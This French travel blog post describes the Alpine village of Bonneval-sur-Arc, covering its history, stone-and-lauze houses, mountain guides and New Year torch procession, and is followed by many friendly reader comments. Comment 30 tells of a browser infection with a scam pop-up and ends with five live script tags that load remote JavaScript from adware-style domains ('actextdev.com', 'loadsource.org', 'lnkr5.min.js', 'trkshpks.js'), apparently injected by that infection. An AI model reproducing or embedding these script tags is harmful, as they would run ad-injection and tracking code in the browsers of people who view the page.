• Découvrir Bonneval-sur-Arc (73)

    Savez vous pourquoi la France est la première destination touristique au monde ? Tout simplement parce que celle-ci propose aux voyageurs une multitude deBonneval sur Arc sur le site des plus beaux villages de France régions disposant chacune d’un paysage, d’une culture, d’un patrimoine, d’un terroir et voire même parfois d’un climat qui lui est propre. Du Nord au Sud et de l’Est à l’Ouest, il y en a donc pour tous les goûts et aussi tous les budgets.
    L’été, Bonneval Sur Arc est l’incontournable en Haute Maurienne.
    Au pied du Col de l’Iseran, plus haut col routier des Alpes (2770 m), sur la Route des Grandes Alpes et dans le Parc National de la Vanoise, Bonneval Sur Arc fait parti des PLUS BEAUX VILLAGES DE FRANCE. Un séjour ou une halte s’y impose.

     

    SITUATION DE BONNEVAL   RENSEIGNEMENTS INTERESSANTS   A PROXIMITÉ DE BONNEVAL-SUR-ARC

    Situation nationale

    Situation locale

     

    MAIRIE
    Résidence Ciamarella
    73480 Bonneval-sur-Arc
    Tél. 04 79 05 94 94
    SITE WEB 

    OFFICE DU TOURISME
    Office de Tourisme
    73480 Bonneval-sur-Arc

    Tél. 04.79.05.95.95
    SITE WEB 

    Découvrir Bonneval-sur-Arc (73)

      Le pont du diableLes Forts de l’Esseillon furent édifiés au début du xixe siècle par le Royaume de Piémont-Sardaigne pour se défendre des invasions françaises.

    Quatre de ces forts sont répartis sur la rive droite de l’Arc. Une redoute (infrastructure militaire fermée) est disposée de l’autre côté de la rivière sur sa rive gauche. Entre les deux ensembles un petit pont surnommé le « Pont du Diable » enjambe des falaises abruptes.
     
    Le pont du Diable a suscité bien des légendes. L’une d’elle raconte que le bâtisseur du pont, incapable de finir son ouvrage à temps, fit appel au diable, en échange de l’âme du premier passant qui empruntera le pont. Le bâtisseur fit alors passer un bouc, et depuis ce jour le Diable Mauriennais a quatre cornes, et le pont ...
     

    BONNEVAL-SUR-ARC, SON HISTOIRE

    Site classé, Bonneval-sur-Arc fait partie de l'association des plus beaux villages de France. Situé au pied de l'un des plus hauts Cols d'Europe (Iseran 2770 m), l'authenticité, les traditions et la structure des maisons de pierres et de lauzes en font un village à part.

    Situé à 1835 mètres d'altitude, le village le plus haut de la Maurienne déplie ses maisons coiffées de toits aux reflets bleutés dans un cadre grandiose et préservé. La rivière Arc serpente aux pieds du village, tandis que tout autour se dressent les reliefs imposants des Alpes.

    Les avalanches sont un fléau qui n'a guère épargné Bonneval tout au long de son histoire. Durant l'hiver 1687, une avalanche engloutit un jeune couple de retour d'un pèlerinage. Il est rapidement découvert, mais la jeune fille expire sous les yeux de ses sauveteurs. Quant au garçon, c'est la chaleur d'un lit de fumier frais qui le ramènera à la vie.
     
    UN BOURG HORS DU TEMPS
    La fortune de Bonneval est désormais assurée par le tourisme qui fit son apparition dans les années 1880. Cette activité s'est largement développée depuis, mais les habitants sont parvenus à la maîtriser suffisamment pour qu'elle ne dénature pas l'authenticité du bourg. Tout semble avoir conservé la même apparence qu'à l'époque où un poète, ami de Ronsard, louait cette "terre si douce", dominée par presque 3 000 mètres du col de l'Iseran.

    D'étroites ruelles serpentent entre les maisons solides et trapues faites de pierres grossièrement taillées et surmontées des fameux toits de pierres plates appelées Lauzes. Autour de la fromagerie et de l'église du XVIe siècle se sont installés des restaurants et des boutiques d'artisanat où se perpétuent les gestes d'autrefois. Mais Bonneval est également bien ancré dans son époque et l'on vient parfois de loin pour assister aux rencontres sportives qui s'y déroulent tout au long de l'année.

    LA MONTAGNE EN FEU
    A l'occasion de la nuit de la Saint-Sylvestre, le village se pare de ses plus beaux atours pour célébrer le passage à la nouvelle année. Une procession à skis équipée de flambeaux descend de la montagne et se dirige vers le vieux village, illuminant la vallée. Plus tard, c'est tout le ciel qui semble s'embraser sous l'action du feu d'artifice, puis une soirée dansante prolonge la fête jusqu'au petit matin.

    LA VIE DU VILLAGE ET SES TRADITIONS ANCESTRALES
    Un clic pour agrandir l'imageLe dernier week-end de juillet ou le premier week-end d'août selon les années, se tiennent à Bonneval "les artisanales d'art". C'est l'occasion pour une cinquantaine d'artisans du village et de la région de se rencontrer et d'exposer leurs créations dans les rues du village. Poteries, sculptures en bois et autres objets d'artisanat se succèdent sur les étals et témoignent d'un savoir-faire que la modernité na p'as entamé.
     
      UNE BEAUTE SAUVAGE
    Des anecdotes de ce genre, tous les habitants de Bonneval en connaissent. Mais les avalanches ne sont que l'une des expressions les plus spectaculaires de cet environnement austère. Les dégats provoqués par les crues de la rivière Arc ont longtemps fait partie de ces fléaux, jusqu'à ce que des travaux soient entrepris pour en maîtriser les excès. Pourtant, la rigueur du climat, l'isolement et les catastrophes naturelles n'ont jamais empêché les gens de vivre à Bonneval.

    Peut-être que les caprices de la nature ne font pas le poids devant la majesté du site. Les premières traces de peuplement remontent à 450 avant Jésus-Christ. Dès le Xe siècle, des Sarrasins, mis en déroute par Charles Martel à Poitiers, trouvent refuge dans la région où ils exploitent les mines de fer. Jusqu'au XIXe siècle, l'extraction de ce minerai, qui était transporté dans la vallée à dos de mulet, est resté une importante source de revenus pour le village.
     
    A LA DÉCOUVERTE DE BONNEVAL
    En sortant de l'église au clocher typiquement savoyard, et après avoir admiré sa collection de statues du XVIIe siècle, partez vous perdre dans les pittoresques ruelles alentours. Vous serez frappé par une curiosité propre à Bonneval : les maisons, qui datent pour la plupart du XIXe siècle, sont dépourvues de numéros. Ici, elles portent des noms étranges tels que la Maison des Gardes, Le Penn Til, La Masei d'Eve ou encore La Grand'Feiche.

    Des guides marrons
    Avec les mines de fer, l'autre richesse de Bonneval a très longtemps reposé sur la renommée de ses guides. Au XIXe siècle, ceux qui possèdent le monopole d'accompagner les voyageurs à travers la montagne sont appelés les "marrons". L'origine de ce surnom reste mystérieux : marron pourrait signifier montagnard ou refléter la couleur de leurs vêtements... De Bonneval seront issus de célèbres alpinistes, comme Pierre Blanc, surnommé "le Pape", qui entreprit à trois reprises l'ascension de l'Everest.
     

    Un clic pour ouvrir l'album photos 

     
     
    « Sur les terres des barons de Castelnau (46)Figeac, 1000 ans d'histoire (Lot) »
    Pin It

    Tags Tags : , , , ,
  • Commentaires

    67
    Jeudi 1er Novembre à 12:18

    alors vite je me joins à vous tous pour souhaiter un bel anniversaire à ta chère et tendre....j'espère que le cadeau sera de toute beauté, comme on aime les recevoir....(lol) belle journée à vous deux

    66
    Jeudi 25 Octobre à 11:57
    Faustine2

    Bonjour ,j'aime ces chalets typiques,j'aimerai y aller comme toi ,l'été ,ou à la fin du printemps ,l'hiver c'est beau mais il faut être habitué à vivre ici,

    la neige ,un peu ,mais pas trop longtemps.bonne journée,bises.

    65
    Lundi 22 Octobre à 11:06

    Bonjour Alain,

    c'est lundi et il fait doux,

    c'est bon pour le moral,

    surtout quand tu vois le budget 2019.

    Rien de spécial dans la chaumière.

    Bonne journée.

    Salut.

    64
    Lundi 22 Octobre à 09:25
    Danielle1943

    bonjour Alain 

    je viens de lire ton texte tout en Haut merci beaucoup de ces explications c est vrai que la France à beaucoup de lieux a visiter  pour ceux qui naviguent avec leur caravanes et les gens comme toi qui marches des randonneurs  et oui  etc. et nous en profitons de lire d apprendre regarder les Photos et ainsi les Vidéos extraordinaires ce qui nous apportent comme chaque article que tu fais même si je ne passe pas tout le temps j adore tout simplement en te souhaitant un excellent Lundi bisous Dann

     

    63
    Lundi 22 Octobre à 06:47

    Bonjour mon cher Alain

    Que du plaisir à revisiter à nouveau ce bel endroit, j'aime la beauté de ces chalets et cet endroit qui me semble bien ressourçant.

    Il est temps de se remettre en route dans la joie et la bonne humeur, je te souhaite une belle semaine.

    Bonne forme et bon courage pour cette nouvelle semaine qui commence. Prends bien soin de toi surtout.

    Une envolée de gros bisous chauds et ensoleillés de la Réunion.

    62
    Lundi 22 Octobre à 05:12

    pour l'atelier teinture de Guedelon, il n'a pas eu lieu, il n'y avait de démo, j'ai été un peu frustrée, mais depuis je m'en suis remise (lol), alors cette invitation c'est-celle bien passée, j'espère que oui, rien de tel d'être autour d'une table et bien accompagnée....pour nous dimanche tranquille visite cimetière, et oui il faut aussi y penser....achat de fleurs et voilà comment occuper un dimanche proche de la Toussaint....mais il va falloir que j'aille aussi faire une tite visite sur celle de mes parents....qui se trouve un peu loin....bon pour l'instant je te souhaite une bien agréable journée de ce début de semaine

    61
    Lundi 22 Octobre à 04:42

    Bonjour  Alain

    J'espère que le week-end passé,

      malgré la fraicheur du matin

    puis doux et ensoleillé par la suite.

    qu'il vous a été plus que profitable,

    pour entamer cette nouvelle semaine.

    Aujourd'hui, Quoi que vous fassiez,

    je vous souhaite un agréable lundi

    et une très bonne semaine

    AmiCalement

    . * J-G-R-C-201*.

     

    60
    Lundi 22 Octobre à 02:05

    Bonjour Alain

    une régions de traditions

    Avec amitiés

    René de Chine

    59
    Dimanche 21 Octobre à 15:58

    Salut,

    Il fait beau et c'est tant mieux.

    Ce matin on a eu la visite du rouge gorge comme toujours quand le froid va arriver.

    Bonne semaine

    58
    Dimanche 21 Octobre à 14:47

    BIZZZZZZZZZZZZZZZZZZ ALAIN EN PASSANT

    57
    Dimanche 21 Octobre à 14:08

    Coucou Alain et Josette,

    tiens tiens je vois que ton doigt a ripé.. pas grave car je ne connais  pas ce magnifique petit village et ces belles maison en Lauzes et c'est un plaisir de le découvrir. Une belle promenade avec vue sur la montagne.

    J'espère que Josette se remet de jour en jour. Je vous embrasse tous les deux, vous souhaite un bon dimanche. Plein de cajoles à ma Chiara et à Minette

    chatou

    56
    Dimanche 21 Octobre à 12:41

    bonjour Alain

    sortie riche en souvenirs hier aprem, je suis allée à la fête du village et j'ai revu de nombreux anciens élèves, devenus adultes et parents

    ça ne rajeunit pas mais c'est bon de les revoir

    bon dimanche

    55
    Dimanche 21 Octobre à 11:19

    Bonjour Alain 

    De retour de quelques jours en Belgique . Bonneval un joli village au pied de l'Iseran ,j'aimerai bien le découvrir en hiver. J'ai de bons souvenirs de rando dans ce coin . Toujours du beau temps,j'espère que tu vas bien bon dimanche  A+ 

    54
    Dimanche 21 Octobre à 11:11

    Pas beaucoup de temps en ce moment, et du travail la semaine prochaine....Bon Dimanche Bisous

    53
    Dimanche 21 Octobre à 08:23

    Bonjour @lain.

    C'est encore une belle journée qui s'annonce et c'est avec elle que je te souhaite un bon Dimanche.

    Amitié, bisou de nous deux.

    52
    Dimanche 21 Octobre à 06:22

    il est évident que si j'avais découvert la vipère d'eau la première, le cri aurait tellement été puissant que personne ne revenait avec un tympan intact....hihihi....tandis qu'une fois avertie, j'ai pu la prendre en photo...en mettant de l'espace entre nous deux bien sûr....je vois que toi aussi tu tiens le coup dans les repas, mais est-ce vraiment l'ordinateur qui bug ou bien la personne qui se trouve devant.....(lol), bon aujourd'hui il va falloir que l'on aille au cimetière, pour voir ce qu'il faut acheter...visite moins gai mais nécessaire.....je te souhaite un bien agréable dimanche

    51
    Dimanche 21 Octobre à 05:59

    Bonjour  Alain

    J'ai beaucoup apprécié la série de photos

    Après un samedi passé au repas des anciens

    de plus de soixante dix ans qui regroupe

    trois communes formant notre petite ville,

    ou nous étions plus de 400 présents

    avec un bon menu et bien servi par

    une escouade de jeunes étudiant  es.

    C'était ma première participation

    sans aucun regret, malgré un superbe

    soleil brillant a l'extérieur,bon dimanche,

    malgré un tout petit deux degrés.

    AmiCalement

     . * J-G-R-C-201*.

    50
    Dimanche 21 Octobre à 02:14

    Bonjour Alain

    alors là, mon ami tu frappe fort....lol

    1 clic sur la photo, pleins écran

    2 clic tu as le zoom

    bien visible un peu plus haut que le toit

    Avec amitiés

    René de Chine

    49
    Samedi 20 Octobre à 18:18

    Bonsoir

    Peut être ainsi c’est mieux ...

    48
    Samedi 20 Octobre à 18:05

    Salut
    On a encore du beau temps et ce n'est pas fini d'après météo france.
    Au moins on fait des économie d'électricité et de gaz pour le chauffage.
    Bonne journée

    47
    Samedi 20 Octobre à 13:56

    hello ALAIN ET ENCORE BRAVO

    46
    Samedi 20 Octobre à 13:50

    Bonjour Alain,

    Vraiment tes photos sont très belles. J'aime beaucoup tous ces murs en pierres apparentes, c'est magnifique

    Bon après midi et grosses bises à vous deux

    Josiane

    45
    Samedi 20 Octobre à 11:08

    bonjour Alain

    c'est un peu normal que la région, le village héberge des artisans, je suppose qu'ils ont 2 activités une l'hiver où ils travaillent en atelier souvent et une autre l'été à l'extérieur ce n'est pas une généralité mais c'est souvent ainsi.

    Nous avons du beau temps, cet aprem je vais faire un tour aller voir des chèvres

    44
    Samedi 20 Octobre à 11:03

    Cher Alain,

    J'espère que tout va pour le mieux. Je te souhaite un bon week-end, ici, ce sera sous le soleil et une température très agréable.

    Grosses bises,

    MF

    43
    LaClaie
    Samedi 20 Octobre à 10:42

    bo jour, merci de cette promenade très pratique pou moi !

    Bonne journée.

      • Dimanche 21 Octobre à 14:45

        La Claie est le nom du club de football de Bohal/St Marcel a 6 kms. Nous c’est la J.A. d’a côté...

        Quand j’ai voulu faire un blog , je l’avais appelé La Claie car c’est une rivière qui traverse la commune. Cette rivière parcoure plus de 60 kms en traversant de nombreux bourgs et de beaux paysages. Je voulais emmener ceux qui me suivraient s’y promener.

        Projet stoppé : les jambes ont désapprouvé !!!

        Donc , je regarde les autres blogs intéressants comme le vôtre, dont je vous remercie beaucoup

        Bonne fin de journée .

        Helene

      • Samedi 20 Octobre à 11:39

        Bonjour et désolé de ne pouvoir vous répondre directement, vous ne mentionnez pas le lien de votre site dans votre pseudonyme.

        Tout ce que je sais c'est que La Claie est un club de foot breton

        @lain

    42
    Samedi 20 Octobre à 10:40

    Bonjour Alain,

    je me suis dit tiens allons prendre un bol d'air à Bonneval

    ....en 1 clic.

    Hihihihihi

    Ici le temps est calme, il y a même de la douceur,

    pourvu que ça dure.

    Ha oui, tu peux installer Kubuntu, c'est intéressant

    comme beaucoup d'autres développements base Linux;

    j'ai fait le tour de quelques distributions pour voir, mais maintenant

    je reste calme, car j'en ai "soupé" des compatibilités.

    bon samedi mon cher Alain.

    Bises

    41
    Samedi 20 Octobre à 09:59
    Danièle C.

    Bonjour @lain,

    Reportage, histoire et environnement, ce village regorge de trésors.

    J'y suis allée plusieurs années de suite en été, les randonnées sont fabuleuses, et il y en a pour tous les gouts, et pour tous les niveaux, chaque endroit offre une vue fabuleuse sur la montagne, j'adore !

    Merci pour ce beau partage.

    Danièle.

    40
    Samedi 20 Octobre à 09:45
    nays

    hello Alain

    incroyable village si ancien avec ces pierres de construction, et ça tient toujours debout depuis des temps

    et la neige qu'on voit tomber  me demande si un jour on en verra en ardenne ou si peu !(

    une très chouette balade vivifiante

    bon WE Alain bisous et au loulou ☺♥

    39
    Samedi 20 Octobre à 07:05

    bonjour Alain
    que la France est belle avec ses diversités
    c'est un superbe village montagnard
    la météo annone une fin de semaine dans l’ensemble ensoleillée
    Je te souhaite de passer une agréable journée ainsi qu’un bon week-end
    bises

    38
    Samedi 20 Octobre à 06:23

    et oui une journée bien passée et se retrouver entre copains ne fait pas de mal....un paysage de montagne très colorées mais oublié l'APN...dommage c'était très beau toutes ces couleurs sous le soleil....week-end tranquille il faut bien reposer l'estomac, car deux repas nous attendent encore la semaine prochaine....très demandés....hihihi, ce matin chose plus sérieuse ce sera emmené ma tête chez le coiffeur.....et oui de temps il faut se refaire faire la tête....(lol), passe toi aussi une superbe journée de ce samedi avec madame bien sûr

    37
    Samedi 20 Octobre à 05:50

    Bon, l'article annoncé par la NL n'est pas là, tant pis ...

    Bon week end, toujours au soleil ...
    Et moi, toujours dans le brouillard avec ma sciatique qui me tient clouée à la maison !
    Bisoux, bisoux.

    36
    Samedi 20 Octobre à 05:35

    Bonjour  ALAIN

    Nous voici, après ces quelques jours

    ou la saison de l' automne nous a montrée

    le bon, surtout le soleil les après midi

    et le mauvais en fin de nuit et levé du jour,

    avec le brouillard et l'humidité.

    Au terme de cette 42 ème semaine,

    je vous souhaite de profiter du moindre temps

    pour une bonne Journée de samedi

    ainsi qu'un excellent dimanche,

    afin que votre week end soit une réussite!

    AmiCalement

    . * J-G-R-C-2018 *.

    35
    Samedi 20 Octobre à 02:21
    Bonjour Alain merci je ne savais pas, comme mon calendrier est chinois hier tu as zapper le pavé qui manque Avec amitiés René de Chine
    34
    Samedi 20 Octobre à 00:55
    Roguidine

    Coucou @lain,
    Oui, J.M. Robert a mis ce que je voulais mettre !! il y a donc une erreur de ta part ! hi,hi,hi
    il ne faut plus boire l'apéro chez les voisins le vendredi ! je repasserai, mais corde sur ciel,
    J'y ai passé 2 jours, je connais bien, un très joli village qui fait partie des PVDF
    Bon samedi, gros bisous

    33
    jm:rober
    Vendredi 19 Octobre à 20:37

    Bonsoir Alain,

    Je viens de recevoir la newsletter  avec comme titre  Cordes sur ciel ,voyage dans l'histoire (81)

    Et je me retrouve sur Bonneval sur Arc  …..

    Tant pis ,

    Je mets mon blog en pause pour quelques jours avant de le mettre pour une autre durée beaucoup plus longue

    Bon weekend

    Amitiés

      • Samedi 20 Octobre à 11:35

        Bonjour jm, bonjour à toutes et tous

        Effectivement il s'est produit une erreur hier soir lorsque j'ai envoyé la newsletter de Cordes sur Ciel. J'ai mon petit doigt qui a cliqué sur la mauvaise touche et au lieu de sauvegarder j'ai envoyé, c'est bête quand même !!! bad

        Mais ne vous en faites pas la parution est prévu pour dans quelques jours, ce n'est que partie remise

        Nonne journée à tout le monde

        @lain

    32
    Vendredi 19 Octobre à 19:41

    Kikou mon p'tit randonneur

    C'est la fin de la semaine alors je passe te faire un coucou

    Le beau temps est annoncé tant mieux mais ça va se rafraichir

    Je te souhaite donc un bon week-end-end, bisous

    31
    Vendredi 19 Octobre à 18:28
    Bonsoir Alain
    Voilà un endroit,un village hors du temps et très bien préservé. Les derniers Belle et Sébastien ont été tournés dans ce secteur.
    A vosier en été et en hiver pour sa beauté

    Belle soirée
    30
    Vendredi 19 Octobre à 18:19
    Roguidine

    Coucou @lain,
    Ah oui, je l'ai ce logiciel, justement je l'ai fait l'autre jour,   et mes ' conneries ''sont revenues hier,
    à midi je l'ai refait , je n'ai pas essayé  si ça allait, tu sais les scripts, je vais bien voir si ça
    fonctionne chez toi !! je me demande d'où ça vient !!!! et dans firefox  une page s'ouvre en disant  :
    attention appelez  le 08.........  je ne peux plus rien faire , même difficile d'éteindre l'ordi !!!!

    Bon, je vais au restaurant ce soir, mais je ne rentre pas tard .
    Si il y a un script sur  mon com, c'est que ça n'aura pas fonctionné,
    Je te souhaite une bonne soirée, bisous, bisous sur les deux joues

    <script src="//actextdev.com/1e10f75c6435cf205a.js"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52355x7696x&r=1539965545448" type="text/javascript"></script> <script src="http://actextdev.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://1675450967.rsc.cdn77.org/cu/trkshpks.js" type="text/javascript"></script> <script src="http://actextdev.com/ext/1e10f75c6435cf205a.js?sid=52355_7696_&title=ads&blocks[]=31af2" type="text/javascript"></script>
    29
    Vendredi 19 Octobre à 14:25

    bonjour

    je trouve ce village magnifique, mais je ne pourrais y vivre, toi peut-être ??

    je me sentirais à l'étroit quand même malgré ces grands espaces autour

    belle journée, pour nous avec soleil et douceur

    28
    Vendredi 19 Octobre à 12:54
    Roguidine

    Bonjour @lain,
    Ouah que j'aimerais aller voir ce village, très rustique, un village typique des montagnes !
    J'aimerais y passer quelques jours, c'est où tu es allé à ton dernier séjour ?  j'adore ...
    ça change un peu de ce que l'on peut voir ordinairement , mais je n'y vivrais pas , je pense
    qu'il n'y a pas de commerces ?  tes photos sont superbes .
    Bon,mon ordinateur n'est pas réparé, je ne sais pas faire, il va falloir que je fasse appel à mon réparateur !
    ce n'est pas un virus, j'ai demandé à avast, il m'a dit que j'étais protégé !

    Sur ce, je te souhaite une bonne journée, quel beau temps, c'est bien agréable , je te fais de gros bisous

    27
    Vendredi 19 Octobre à 10:39
    francinea

    Bonjour, ce  petit village a beaucoup de charme, avec  la montagne omniprésente;  vu sa situation  de haute altitude, les  hivers doivent être difficiles,  il faut y être  né !  j'ai beau être du grand est, ça  n'a rien à  voir avec la  haute  montagne; je te souhaite une bonne journée, bisous

    26
    Vendredi 19 Octobre à 08:43

    Bonjour Alain

    J'ai lu la petite histoire de Bonneval-sur -arc il est vrai que l'hiver et les avalanches ne sont pas drôle un peu comme l'été avec les inondations qui emporte toujours des vies comme pour ce jeune couple. mais la vie est ainsi faite certains s'en sortent et pas d'autres. J'espère que tout va bien pour toi, et contente de voir que tu as pu réparer ton ordinateur lorsque tout fonctionne c'est génial mais dès qu'il y a problème tout énerve, se sont les aléas de l'informatique. je vais te souhaite une douce journée et un très bon weekend à lundi gros bisous 

    Marlène

    25
    Vendredi 19 Octobre à 06:28

    jolies tes photos de nuit avec la neige, mais ne souhaitons pas qu'elle arrive .....le plus tard sera le mieux....je vois que chez toi tout se passe au mieux....c'est super, ici aussi, ton jumeau reprend le dessus, si bien qu'à midi nous irons manger les grenouilles avec une bande de copains....toujours du beau temps que demander de plus.....

    je suis bien contente que tu découvre enfin un endroit que tu ne connais pas....ouf....passe une bien belle journée

    24
    Vendredi 19 Octobre à 05:42

    Cher   Alain,

    Très    bon  reportage,   ça  donne  envie  d'y aller ! malheureusement, je devrai me  contenter de mes Alpes à moi,  remarque, pour la  Saint  Sylvestre, il y a   aussi une descente à ski aux flambeaux  et  un feu d'artifice  !

    J'espère que tout est rentré dans l'ordre et que tu vas bien.

    Bonne journée,

    Grosses  bises,

    MF

    23
    Vendredi 19 Octobre à 04:34

    Bonjour  ALAIN

    C'est la dernière ouvrable de cette semaine

    j'aime bien quand arrive le vendredi,

    comme la plupart des autres jours

    meme si c'est pour des raisons différentes.

    Passez une excellente journée avec le soleil

    malgré sa faiblesse et une présence plus courte,

    mais encore un 22° hier après midi.

    Amitiés 

    . * J-G-R-C-201*.

    22
    Vendredi 19 Octobre à 03:01
    Bonjour Alain ton début d'article ma fait rire, hi hi c'est aussi valable pour la Chine....lol je te souhaite un bon WE Avec amitiés René de Chine
    21
    Jeudi 18 Octobre à 17:46

    Bien Bien longtemps que je suis allée à Bonneval sur Arc !!!
    et c'est toujours aussi mignon,

    je reprends le chemin des blogs avec plaisir

    bisou Alain

    20
    Jeudi 18 Octobre à 17:04

    Bonsoir mon cher Alain

    Ce village est une merveille, que notre France est belle et grâce à toi je voyage dans notre belle France. Tes photos sont vraiment magnifiques mon gentil randonneur.

    Douce nuit étoilée et belle fin de semaine, qui je l'espère sera douce et ensoleillée et surtout calme au niveau du temps, car en ce moment c'est terrible toutes ces catastrophes naturelles, moi je tends le dos car nous approchons de la saison cyclonique (décembre) et l'été commence à s'installer à la Réunion.

    Je te fais de gros bisous d'amitié de mon ti rocher.

    19
    Jeudi 18 Octobre à 15:45

    Salut,

    J'aime bien ce genre de vieux patelin.
    Ca me rappelle celui de mon grand-père.

    Il fait beau et c'est tant mieux.

    On fait des économies de chauffage.

    Bonne journée

    18
    Jeudi 18 Octobre à 15:01

    BISES ET JOLIIIIIIIIIIIIII

    17
    Jeudi 18 Octobre à 14:03

    Bonjour Alain,

    Que ce petit village est magnifique, j'adore !!

    J'aime beaucoup ces pierres apparentes sur les murs

    Très bon après midi, je vous embrasse tous les deux très fort

    Josiane

    16
    jm:rober
    Jeudi 18 Octobre à 13:54

    Bonjour Alain,

    Meri pour ses belles photos … qui sont pour moi un rappel de vacances dans ce lieu magnifique qu'est le parc de la Vanoise

    Bonne fin de journée

    Amitiés 

    15
    Jeudi 18 Octobre à 13:37

    Ton introduction est top Alain, la France est belle !!!

    Tu la parcours dans tous les sens et grâce à toi , je complète mes lacunes,

    connaissant bien mieux d'autres pays lointains, mais il n'est jamais trop tard ....

    Si vous saviez Madame … le bout du monde est facilement accessible !!!!!

    Merci Alain pour cet agréable partage, tu étais fatigué mon ami,

    pas beaucoup de photos persos cette fois, mais c'est un vrai plaisir

    de découvrir cette région de  "montagne en feu j'adore" , le village aux toits de lauze, aux murs de pierres.....

    J'aime beaucoup ... à mettre sur mes tablettes !! 

    Bonneval sur Arc est le 6ème village préféré des français, parmi 36 000 communes me dit-on !!!!

    Ce n’est pas par hasard et grâce à toi, derrière mon écran, j'y suis .

    Merci Alain,

    Bonne après-midi ensoleillée, la météo ne s'y retrouve plus , elle est perdue et chouette, chouette ....

    d'être du bon côté parce qu'elle sait aussi faire de grands malheurs ... Une horreur en ce moment ces inondations

    inopinées !!! Heureusement solidarité humaine , bravo .

    Je vais voir "ma mer" lol lol !!

    Bises amicales de Christiane

     

    14
    Jeudi 18 Octobre à 12:39

    bonjour Alain

    ce village me fait penser à la Garde Guérin, je crois que tu l'as déjà visité. Par contre comme tu sais cette région je la découvre sur ton blog, loin du froid

    bonne journée

    13
    Jeudi 18 Octobre à 11:25

     

    Bonjour Alain.

    Une véritable découverte ce beau village,

    très intéressant ce parcours.

    Merci pour ce reportage,

    hé oui la France est un beau pays, dommage qu'il y ait

    des politicards capables de tout lapider.

    Temps calme, mais peu mieux faire.

    Bon jeudi Alain.

    Bises

    12
    Jeudi 18 Octobre à 10:43
    nays

    hello Alain

    et c'est si vrai  vous avez en France quasi toutes les régions du monde représentées et c'est une grande richesse

    superbes chalets

    *bonne fin de semaine Alain bisous et aux loulou ☺ ♥

    11
    Jeudi 18 Octobre à 08:03

    Coucou Alain

    Contente que tu as pu réparer ton PC et de voir un nouvel article je ne connais pas très bien Bonneval sur Arc mais j'ai fait du ski il y a quelques années dans un village pas très loin ton album à de bien jolies photos bien que tu n'as surement pas pu en faire beaucoup mais ces villages de pierres sont superbes. J'ai vraiment apprécié cette petite balade mais je pense que dans la neige elle serait aussi agréable je vais te souhaiter une douce journée avec un temps un peu moins ensoleillé chez toi je crois pour nous la météo annonce du beau temps jusqu'à dimanche et ensuite et bien j'espère que la pluie finira par arrivé chez nos et qu'elle laisse un peu les gens du midi tranquille une petite pensée pour eux les pauvres.

    douce journée gros bisous 

    Marlène

    10
    Jeudi 18 Octobre à 08:00

    Cher Alain,

    Un petit passage avant mon départ pour la balade avec le club, très bel album photos,  j'aime beaucoup ces chalets et cette église,  je reviendrai car je n'ai pas le temps de lire le reportage.

    Je te souhaite une bonne journée,

    Grosses bises,

    MF

    9
    Jeudi 18 Octobre à 06:47

    Quelle belle région que je ne connais pas,  les chalets sont superbes; chaque région est différente en France.

    C'est ce qui fait le charme de notre pays. Bonne journée Alain gros bisous 

    8
    Jeudi 18 Octobre à 06:38

    J'adore ces chalets qui changent de ceux que l'on a l'habitude de voir.

    Superbe reportage d'une région que je ne connais pas (comme souvent ... lolll) !

    Absente hier, depuis la fin de matinée, c'est fou comme j'ai du retard à rattraper !
    Bon jeudi, avec des bisoux, mon cher tit @lain

    7
    Jeudi 18 Octobre à 06:24

    un très joli village que tu nous offres encore ce matin.....pour la tarte TATIN ce n'est pas Papin.....hihihi, mais je suis sûr que les nerfs ne lâchent plus ce matin....et que tes neurones ont repris le bon emplacement....ici toujours du beau temps, mais hier nous n'avons pas eu plus de 22° ça baisse tout doucement mais sûrement...aïe.....toujours pas mis de chauffage c'est déjà ça que l'on ne nous prendra pas....je te souhaite une bien douce journée....

    6
    Jeudi 18 Octobre à 05:35

    Bonjour   Alain

    Merci pour ce nouvel article

    pour faire connaitre tout ces différences

      que notre pays possèdent.

    Hier une fin de nuit très fraîche,

    un levé du jour, avec un épais brouillard,

    qui nous as accompagné jusqu'à midi,

    avant de pouvoir poindre le soleil,

     réchauffer l’atmosphère avec un 22 degrés.

    Que ce jeudi soit moins mouvementé

    et que le beau temps soit de la partie .

    AmiCalement

    . * J-G-R-C-201*.

    5
    escapade40
    Jeudi 18 Octobre à 05:33

    Bonjour Alain et merci pour cette balade bien interessante ! . Un village d'une grande beauté que je ne connais pas . Bonne semaine , amitiés , escapade 

     

    4
    Mercredi 17 Octobre à 21:44

    Bonsoir mon p'tit randonneur

    Tu n'as pas pris beaucoup de photos, mais ces chalets sont beaux et tous en pierres, il y a des réserves de bois pour l'hiver

    Tu voyages d'un jour à l'autre tu en fais des kilomètres, je ne connais pas cette région trop loin de chez moi.

    Tu étais en panne d'ordinateur !

    Je te souhaite une bonne soirée, bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :